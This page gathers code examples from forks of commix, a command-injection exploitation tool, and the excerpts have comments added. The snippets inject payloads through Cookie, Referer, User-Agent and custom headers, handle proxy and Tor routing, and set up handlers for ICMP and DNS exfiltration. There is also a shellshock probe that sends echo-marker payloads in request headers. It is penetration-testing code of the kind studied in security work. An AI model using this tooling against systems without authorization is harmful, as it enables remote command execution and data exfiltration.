コード例 #1
ファイル: requests.py プロジェクト: fleischkatapult/commix
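def get_request_response(request):
  """Send `request` via proxy.use_proxy() when an HTTP proxy is configured.

  Only the proxy branch is part of this excerpt; no return statement is
  visible here.

  On urllib2.HTTPError the error is reported (guarded by
  settings.IGNORE_ERR_MSG), checks.continue_tests() decides whether to keep
  going or exit, and `response` is set to False. On urllib2.URLError the
  reason is printed and SystemExit is raised.
  """

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError as err:
      if settings.IGNORE_ERR_MSG == False:
        # `err` stays bound to the exception so checks.continue_tests()
        # receives the exception object; the printable text is kept apart
        # in `err_msg`.
        err_msg = str(err) + "."
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
           settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print("")
        print(settings.print_critical_msg(err_msg))
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError as err:
      # Drops the first two space-separated tokens of the reason
      # (presumably an "[Errno N]" prefix -- confirm against real output).
      err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print("")
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()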
コード例 #2
ファイル: requests.py プロジェクト: BMaChina/commix
def get_request_response(request):
  """Issue `request` through proxy.use_proxy() if an HTTP proxy is configured.

  Only the proxy branch is part of this excerpt. An HTTP error whose status
  equals settings.INTERNAL_SERVER_ERROR is recorded silently as
  `response = False`; other HTTP errors are printed and
  checks.continue_tests() decides whether to continue. Any URLError ends the
  process through SystemExit.
  """

  def _print_spacing():
    # Blank lines written ahead of a critical message; which ones appear
    # depends on the verbosity level and the state flags in `settings`.
    verbose = settings.VERBOSITY_LEVEL >= 1
    if (not verbose and settings.TIME_BASED_STATE == False) or \
       (verbose and settings.EVAL_BASED_STATE == None):
      print("")
    if verbose and settings.LOAD_SESSION == False:
      print("")

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError as http_err:
      if str(http_err.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        text = str(http_err) + "."
        _print_spacing()
        print(settings.print_critical_msg(text))
        if checks.continue_tests(http_err) == True:
          # With the flag set, this branch is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError as url_err:
      if "Connection refused" in url_err.reason:
        text = "The target host is not responding. "
        text = text + "Please ensure that is up and try again."
        _print_spacing()
        print(settings.print_critical_msg(text))
      # Every URLError is fatal; only "Connection refused" gets a message.
      raise SystemExit()
コード例 #3
ファイル: eb_injector.py プロジェクト: hosttor/commix
def referer_injection_test(url, vuln_parameter, payload):
    """Request `url` with the URL-unquoted `payload` as the Referer header.

    The request is issued once with a default opener and, when
    menu.options.proxy is set, a second time through a ProxyHandler.
    Only the proxy branch of the error handling is part of this excerpt.
    On the receiving side the Referer value is therefore untrusted input.
    """
    def inject_referer(url, vuln_parameter, payload, proxy):
        # The proxy handler is only passed to build_opener() when one is given.
        handlers = [] if proxy is None else [proxy]
        opener = urllib2.build_opener(*handlers)

        req = urllib2.Request(url)
        # Check if defined extra headers.
        headers.do_check(req)
        req.add_header("Referer", urllib.unquote(payload))
        return opener.open(req)

    proxy = None
    # This first call is outside the try block, so its errors are not
    # handled here.
    response = inject_referer(url, vuln_parameter, payload, proxy)
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
            response = inject_referer(url, vuln_parameter, payload, proxy)
        except urllib2.HTTPError as http_err:
            if settings.IGNORE_ERR_MSG == False:
                print("\n" + Back.RED + settings.ERROR_SIGN + str(http_err) + Style.RESET_ALL)
                if checks.continue_tests(http_err) == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    raise SystemExit()
            response = False
        except urllib2.URLError as url_err:
            if "Connection refused" in url_err.reason:
                notice = "The target host is not responding." + " Please ensure that is up and try again."
                print("\n" + Back.RED + settings.CRITICAL_SIGN + notice + Style.RESET_ALL)
            # Every URLError is fatal; only "Connection refused" gets a message.
            raise SystemExit()
コード例 #4
ファイル: icmp_exfiltration.py プロジェクト: hanshaze/commix
def icmp_exfiltration_handler(url, http_request_method):
  """Build the HTTP request for the ICMP exfiltration option.

  Requires an effective UID of 0. A GET request is built from `url`; for any
  other method the body comes from menu.options.data. The excerpt ends inside
  the proxy branch's HTTPError handler; nothing after it is visible here.
  """
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
    # NOTE(review): os._exit(0) reports exit status 0 on this error path and
    # terminates without running normal interpreter cleanup.
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    
  else:
    # POST body: taken from the command-line data option, URL-unquoted and
    # passed through parameters.do_POST_check() before use.
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
コード例 #5
ファイル: requests.py プロジェクト: BMaChina/commix
def custom_header_injection(url, vuln_parameter, payload):
  """Request `url` with `payload` in the header settings.CUSTOM_HEADER_NAME.

  The request is issued once with a default opener and, when
  menu.options.proxy is set, again through a ProxyHandler. Only the proxy
  branch of the error handling is part of this excerpt. The header value is
  the URL-unquoted payload, so the receiving application sees it as
  untrusted input.
  """

  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # Returns the opened response, or None when opener.open() raises
    # ValueError (the exception is swallowed below).

    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
    try:
      response = opener.open(request)
      return response
    except ValueError:
      pass

  # The timestamp is taken immediately before the request is sent; `end` is
  # not used within this excerpt.
  if settings.TIME_RELATIVE_ATTACK :
    start = 0
    end = 0
    start = time.time()

  proxy = None  
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_custom_header(url, vuln_parameter, payload, proxy)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err_msg:
      # A status equal to settings.INTERNAL_SERVER_ERROR is recorded without
      # any message.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
          settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print "" 
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err_msg:
      # Drops the first two space-separated tokens of the reason
      # (presumably an "[Errno N]" prefix -- confirm against real output).
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
コード例 #6
ファイル: requests.py プロジェクト: Cyber-Forensic/commix
def cookie_injection(url, vuln_parameter, payload):
  """Request `url` with a Cookie header of the form `vuln_parameter=payload`.

  The request is issued once with a default opener and, when
  menu.options.proxy is set, again through a ProxyHandler. Only the proxy
  branch of the error handling is part of this excerpt. The cookie value is
  attacker-chosen text from the server's point of view.
  """

  def inject_cookie(url, vuln_parameter, payload, proxy):
    # Returns the opened response, or None when opener.open() raises
    # ValueError (the exception is swallowed below).
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    # The payload is URL-quoted only when settings.TIME_RELATIVE_ATTACK is set.
    if settings.TIME_RELATIVE_ATTACK :
      payload = urllib.quote(payload)
      
    # The cookie is attached to the opener's default headers, not to the
    # Request object.
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    try:
      response = opener.open(request)
      return response
    except ValueError:
      pass

  # The timestamp is taken immediately before the request is sent; `end` is
  # not used within this excerpt.
  if settings.TIME_RELATIVE_ATTACK :
    start = 0
    end = 0
    start = time.time()

  proxy = None 
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_cookie(url, vuln_parameter, payload, proxy)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        err_msg = str(err) + "."
        print "\n" + settings.print_critical_msg(err_msg)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False  
    except urllib2.URLError, err_msg:
      # Drops the first two space-separated tokens of the reason
      # (presumably an "[Errno N]" prefix -- confirm against real output).
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
コード例 #7
ファイル: tb_injector.py プロジェクト: ardiansn/commix
def custom_header_injection_test(url, vuln_parameter, payload):
  """Request `url` with `payload` in the header settings.CUSTOM_HEADER_NAME.

  A start timestamp is taken before the first request. The request is issued
  once with a default opener and, when menu.options.proxy is set, again
  through a ProxyHandler. Only the proxy branch of the error handling is
  part of this excerpt.
  """

  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # Returns the opened response, or None when opener.open() raises
    # ValueError (the exception is swallowed below).

    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
    try:
      response = opener.open(request)
      return response
    except ValueError:
      pass

  # The timestamp is taken immediately before the request is sent; `end` is
  # not used within this excerpt.
  start = 0
  end = 0
  start = time.time()

  proxy = None 
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_custom_header(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print settings.print_error_msg(err)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err:
      # Every URLError is fatal; only "Connection refused" gets a message.
      if "Connection refused" in err.reason:
        err_msg =  "The target host is not responding."
        err_msg += " Please ensure that is up and try again."
        print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()
コード例 #8
ファイル: tb_injector.py プロジェクト: 0day29/commix
def cookie_injection_test(url, vuln_parameter, payload):
  """Request `url` with a Cookie header of the form `vuln_parameter=payload`.

  The payload is always URL-quoted here. A start timestamp is taken before
  the first request. The request is issued once with a default opener and,
  when menu.options.proxy is set, again through a ProxyHandler. Only the
  proxy branch of the error handling is part of this excerpt.
  """

  def inject_cookie(url, vuln_parameter, payload, proxy):
    # Returns the opened response, or None when opener.open() raises
    # ValueError (the exception is swallowed below).
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    # The cookie is attached to the opener's default headers, not to the
    # Request object.
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    try:
      response = opener.open(request)
      return response
    except ValueError:
      pass
      
  # The timestamp is taken immediately before the request is sent; `end` is
  # not used within this excerpt.
  start = 0
  end = 0
  start = time.time()

  proxy = None 
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_cookie(url, vuln_parameter, payload, proxy)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err:
      # Every URLError is fatal; only "Connection refused" gets a message.
      if "Connection refused" in err.reason:
        print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
              " Please ensure that is up and try again." + Style.RESET_ALL
      raise SystemExit()
コード例 #9
ファイル: eb_injector.py プロジェクト: hosttor/commix
def get_request_response(request):
    """Issue `request` through proxy.use_proxy() if an HTTP proxy is configured.

    Only the proxy branch is part of this excerpt. HTTP errors are printed
    (guarded by settings.IGNORE_ERR_MSG) and checks.continue_tests() decides
    whether to continue; any URLError ends the process through SystemExit.
    """

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            response = proxy.use_proxy(request)
        except urllib2.HTTPError as http_err:
            if settings.IGNORE_ERR_MSG == False:
                print("\n" + Back.RED + settings.ERROR_SIGN + str(http_err) + Style.RESET_ALL)
                if checks.continue_tests(http_err) == True:
                    # With the flag set, this guard is skipped on later HTTP errors.
                    settings.IGNORE_ERR_MSG = True
                else:
                    raise SystemExit()
            response = False
        except urllib2.URLError as url_err:
            if "Connection refused" in url_err.reason:
                notice = "The target host is not responding." + " Please ensure that is up and try again."
                print("\n" + Back.RED + settings.CRITICAL_SIGN + notice + Style.RESET_ALL)
            # Every URLError is fatal; only "Connection refused" gets a message.
            raise SystemExit()
コード例 #10
ファイル: tb_injector.py プロジェクト: 1872892142/commix
def user_agent_injection_test(url, vuln_parameter, payload):
  """Request `url` with the URL-unquoted `payload` as the User-Agent header.

  A start timestamp is taken before the first request. The request is issued
  once with a default opener and, when menu.options.proxy is set, again
  through a ProxyHandler. Only the proxy branch of the error handling is
  part of this excerpt. On the receiving side the User-Agent value is
  untrusted input.
  """

  def inject_user_agent(url, vuln_parameter, payload, proxy):
    # Unlike the cookie/custom-header helpers on this page, no exception is
    # caught here; errors from opener.open() propagate to the caller.
    if proxy == None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)

    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    payload = urllib.unquote(payload)
    request.add_header('User-Agent', payload)
    response = opener.open(request)
    return response

  # The timestamp is taken immediately before the request is sent; `end` is
  # not used within this excerpt.
  start = 0
  end = 0
  start = time.time()

  proxy = None 
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_user_agent(url, vuln_parameter, payload, proxy)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_user_agent(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err:
      # Every URLError is fatal; only "Connection refused" gets a message.
      if "Connection refused" in err.reason:
        print "\n" + Back.RED + "(x) Critical: The target host is not responding." + \
              " Please ensure that is up and try again." + Style.RESET_ALL
      raise SystemExit()
コード例 #11
ファイル: cb_injector.py プロジェクト: ardiansn/commix
def cookie_injection_test(url, vuln_parameter, payload):
  """Request `url` with a Cookie header of the form `vuln_parameter=payload`.

  The payload is used as given (no quoting in this variant). The request is
  issued once with a default opener and, when menu.options.proxy is set,
  again through a ProxyHandler. Only the proxy branch of the error handling
  is part of this excerpt.
  """

  def inject_cookie(url, vuln_parameter, payload, proxy):
    opener = urllib2.build_opener() if proxy is None else urllib2.build_opener(proxy)
    # The cookie is attached to the opener's default headers, not to the
    # Request object.
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    req = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(req)
    try:
      return opener.open(req)
    except ValueError:
      # Swallowed on purpose: the caller then receives None.
      return None

  proxy = None
  # This first call is outside the try block, so urllib2 errors raised here
  # are not handled by the except clauses below.
  response = inject_cookie(url, vuln_parameter, payload, proxy)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError as http_err:
      if settings.IGNORE_ERR_MSG == False:
        text = str(http_err) + "."
        print("\n" + settings.print_error_msg(text))
        if checks.continue_tests(http_err) == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError as url_err:
      if "Connection refused" in url_err.reason:
        text = "The target host is not responding." + " Please ensure that is up and try again."
        print("\n" + settings.print_critical_msg(text))
      # Every URLError is fatal; only "Connection refused" gets a message.
      raise SystemExit()
コード例 #12
ファイル: fb_injector.py プロジェクト: jamesshew/commix
def get_request_response(request):
  """Issue `request` through proxy.use_proxy() if an HTTP proxy is configured.

  Only the proxy branch is part of this excerpt. HTTP errors are printed
  (guarded by settings.IGNORE_ERR_MSG) and checks.continue_tests() decides
  whether to continue; any URLError ends the process through SystemExit.
  """

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError as http_err:
      if settings.IGNORE_ERR_MSG == False:
        # The exception object itself is handed to the message formatter.
        print(settings.print_error_msg(http_err))
        if checks.continue_tests(http_err) == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError as url_err:
      if "Connection refused" in url_err.reason:
        text = "The target host is not responding." + " Please ensure that is up and try again."
        print("\n" + settings.print_critical_msg(text))
      # Every URLError is fatal; only "Connection refused" gets a message.
      raise SystemExit()
コード例 #13
def dns_exfiltration_handler(url, http_request_method):
  """Build the HTTP request for the DNS exfiltration option.

  Marks the run as being in the detection phase, requires an effective UID
  of 0, and builds a GET request from `url` or, for any other method, a
  request whose body comes from menu.options.data. The excerpt ends inside
  the proxy branch's HTTPError handler; nothing after it is visible here.
  """
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    err_msg = "You need to have root privileges to run this option."
    print "\n" + settings.print_critical_msg(err_msg)
    # NOTE(review): os._exit(0) reports exit status 0 on this error path and
    # terminates without running normal interpreter cleanup.
    os._exit(0)

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    
  else:
    # POST body: taken from the command-line data option, URL-unquoted and
    # passed through parameters.do_POST_check() before use.
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err_msg:
      # A status equal to settings.INTERNAL_SERVER_ERROR is recorded without
      # any message.
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        print "\n" + settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          # With the flag set, this branch is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
コード例 #14
ファイル: authentication.py プロジェクト: ardiansn/commix
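def authentication_process():
  """Authenticate against menu.options.auth_url and keep the session cookies.

  A cookie-aware opener first fetches the login URL; every cookie received is
  joined into menu.options.cookie. The opener is then installed globally and
  a second request carrying menu.options.auth_data is prepared. Only the
  proxy branch of sending that request is part of this excerpt.
  """
  auth_url = menu.options.auth_url
  auth_data = menu.options.auth_data
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  # First fetch without the login data; cookies set by the server land in `cj`.
  request = opener.open(urllib2.Request(auth_url))

  # "name=value; " pairs in jar order.
  cookies = "".join(cookie.name + "=" + cookie.value + "; " for cookie in cj)

  if len(cookies) != 0:
    menu.options.cookie = cookies.rstrip()
    if menu.options.verbose:
      # NOTE(review): verbose mode writes the session cookie to stdout, so
      # captured output or terminal logs then contain a session credential.
      success_msg = "The received cookie is " + Style.UNDERLINE
      success_msg += menu.options.cookie + Style.RESET_ALL + "."
      print(settings.print_success_msg(success_msg))

  # From here on plain urllib2.urlopen() calls share the cookie jar.
  urllib2.install_opener(opener)
  request = urllib2.Request(auth_url, auth_data)

  # Check if defined extra headers.
  headers.do_check(request)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError as err:
      if settings.IGNORE_ERR_MSG == False:
        print("\n" + settings.print_error_msg(err))
        # The caught exception is passed on; the handler previously referred
        # to a name that was never bound and failed with NameError.
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          # With the flag set, this guard is skipped on later HTTP errors.
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False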
コード例 #15
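def cookie_injection(url, vuln_parameter, payload):
    """Request `url` with `payload` substituted into the configured cookie.

    The Cookie header is menu.options.cookie with settings.INJECT_TAG
    replaced by the payload. In this variant no request is sent before the
    proxy check. Only the proxy branch is part of this excerpt.
    """
    def inject_cookie(url, vuln_parameter, payload, proxy):
        # Returns the opened response, or None when a ValueError is raised
        # while logging or opening the request.
        if proxy == None:
            opener = urllib2.build_opener()
        else:
            opener = urllib2.build_opener(proxy)

        # The payload is URL-quoted only for time-relative techniques.
        if settings.TIME_RELATIVE_ATTACK:
            payload = urllib.quote(payload)

        # Check if defined POST data
        if menu.options.data:
            # Note: this overwrites the global option with the stored
            # user-defined POST data on every call.
            menu.options.data = settings.USER_DEFINED_POST_DATA
            request = urllib2.Request(url, menu.options.data)
        else:
            url = parameters.get_url_part(url)
            request = urllib2.Request(url)
        #Check if defined extra headers.
        headers.do_check(request)
        request.add_header(
            'Cookie', menu.options.cookie.replace(settings.INJECT_TAG,
                                                  payload))
        try:
            headers.check_http_traffic(request)
            response = opener.open(request)
            return response
        except ValueError:
            pass

    # The timestamp is taken before the request; `end` is not used within
    # this excerpt.
    if settings.TIME_RELATIVE_ATTACK:
        start = 0
        end = 0
        start = time.time()

    proxy = None

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            proxy = urllib2.ProxyHandler(
                {settings.PROXY_PROTOCOL: menu.options.proxy})
            response = inject_cookie(url, vuln_parameter, payload, proxy)
        except urllib2.HTTPError as err:
            # A status equal to settings.INTERNAL_SERVER_ERROR is recorded
            # without any message.
            if str(err.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                # `err` stays bound to the exception so that
                # checks.continue_tests() receives the exception object; the
                # printable text lives in `err_msg`.
                err_msg = str(err) + "."
                print("\n" + settings.print_critical_msg(err_msg))
                continue_tests = checks.continue_tests(err)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    raise SystemExit()
            response = False
        except urllib2.URLError as err:
            # Drops the first two space-separated tokens of the reason
            # (presumably an "[Errno N]" prefix -- confirm against real output).
            err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
            if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
                print("")
            print(settings.print_critical_msg(err_msg))
            raise SystemExit()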
コード例 #16
ファイル: requests.py プロジェクト: BMaChina/commix
  # Check if defined Tor.
  elif menu.options.tor:
    try:
      response = tor.use_tor(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
          settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print "" 
        print settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err_msg:
      err_msg = str(err_msg.reason).split(" ")[2:]
      err_msg = ' '.join(err_msg)+ "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()

  else:
    try:
コード例 #17
ファイル: tb_injector.py プロジェクト: M31MOTH/commix
            response = False
        except urllib2.URLError, err:
            if "Connection refused" in err.reason:
                print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
                      " Please ensure that is up and try again." + Style.RESET_ALL
            raise SystemExit()

    # Check if defined Tor.
    elif menu.options.tor:
        try:
            response = tor.use_tor(request)
        except urllib2.HTTPError, err:
            if settings.IGNORE_ERR_MSG == False:
                print "\n" + Back.RED + settings.ERROR_SIGN + str(
                    err) + Style.RESET_ALL
                continue_tests = checks.continue_tests(err)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    raise SystemExit()
            response = False
        except urllib2.URLError, err:
            if "Connection refused" in err.reason:
                print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \
                      " Please ensure that is up and try again." + Style.RESET_ALL
            raise SystemExit()

    else:
        try:
            response = urllib2.urlopen(request)
        except urllib2.HTTPError, err:
コード例 #18
ファイル: shellshock.py プロジェクト: keoni161/commix
def shellshock_handler(url, http_request_method, filename):
  """Probe `url` with the shellshock technique, one request header at a time.

  For every entry of `shellshock_cves` and every header name in `headers`,
  a request is sent whose single extra header carries the generated payload.
  A probe counts as positive when the response headers contain a header
  named after the probe id. Findings are written to the log `filename`;
  on a positive result the interactive enumeration, file-access and
  pseudo-terminal menus follow.

  Returns False or True from some of the interactive branches; the excerpt
  ends inside the HTTPError handler, so other exits are not visible here.
  `http_request_method` is not used within this excerpt.

  For defenders: a positive result means a request header value was
  interpreted by a shell on the server and its output came back as a
  response header; a patched shell, and not exposing request headers to
  shell-executed handlers, closes that path.
  """

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()

  try: 
    i = 0
    # Here `headers` is iterated as a collection of header names.
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
        # The marker that a vulnerable server would echo back as "<id>:Done".
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)

        # The probe travels in exactly one request header; no body is sent.
        header = {check_header : payload}
        request = urllib2.Request(url, None, header)
        response = urllib2.urlopen(request)

        if not menu.options.verbose:
          # Integer division under Python 2; the float variant is for display.
          percent = ((i*100)/total)
          float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
          
          if percent == 100:
            if no_result == True:
              percent = Fore.RED + "FAILED" + Style.RESET_ALL
            else:
              percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
